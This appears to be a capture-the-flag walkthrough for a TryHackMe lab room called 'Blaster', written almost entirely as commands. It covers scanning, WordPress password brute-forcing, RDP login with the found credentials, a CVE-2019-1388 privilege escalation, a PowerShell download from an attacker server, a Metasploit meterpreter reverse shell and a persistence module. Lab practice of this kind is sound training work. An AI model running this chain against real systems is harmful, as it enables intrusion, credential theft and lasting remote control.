Blaster

Room Link: https://tryhackme.com/room/blaster

Initial Scan

Kali

nmap -A $VICTIM

Scan all ports

port 5985 found

Kali

nmap -sV -sT -O -p 1-65535 $VICTIM

TCP/80 - HTTP

Kali

gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

gobuster dir -u http://$VICTIM/retro -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt

Kali

wpscan --url http://$VICTIM/retro

Kali

wpscan --url http://$VICTIM/retro --enumerate u

Kali

wpscan --url http://$VICTIM/retro  --passwords /usr/share/wordlists/rockyou.txt

Shell

Username: wade
Password: parzival

TCP/3389 - RDP

Kali

xfreerdp +clipboard /u:"wade" /v:$VICTIM:3389 /size:1024x568 /smart-sizing:800x1200
Password: parzival

Privilege Escalation

exploit: https://sotharo-meas.medium.com/cve-2019-1388-windows-privilege-escalation-through-uac-22693fa23f5f

Kali

git clone https://github.com/suprise4u/CVE-2019-1388.git
cd CVE-2019-1388/
python2 -m SimpleHTTPServer 81

Victim(powershell)

powershell -ep bypass
powershell "(New-Object System.Net.WebClient).Downloadfile('http://$KALI:81/HHUPD.EXE','HHUPD.EXE')" 

Metasploit

Kali

msfconsole
use exploit/multi/script/web_delivery
show targets
set target 2
set LHOST 10.10.75.198
set srvport 8082
set payload windows/meterpreter/reverse_http
run -j

Copy powershell command to a the victim in a powershell prompt. Make sure its from a privileged user.

We can run the following to keep persistance after reboot

Kali(msfconsole)

run exploit/windows/local/persistence -X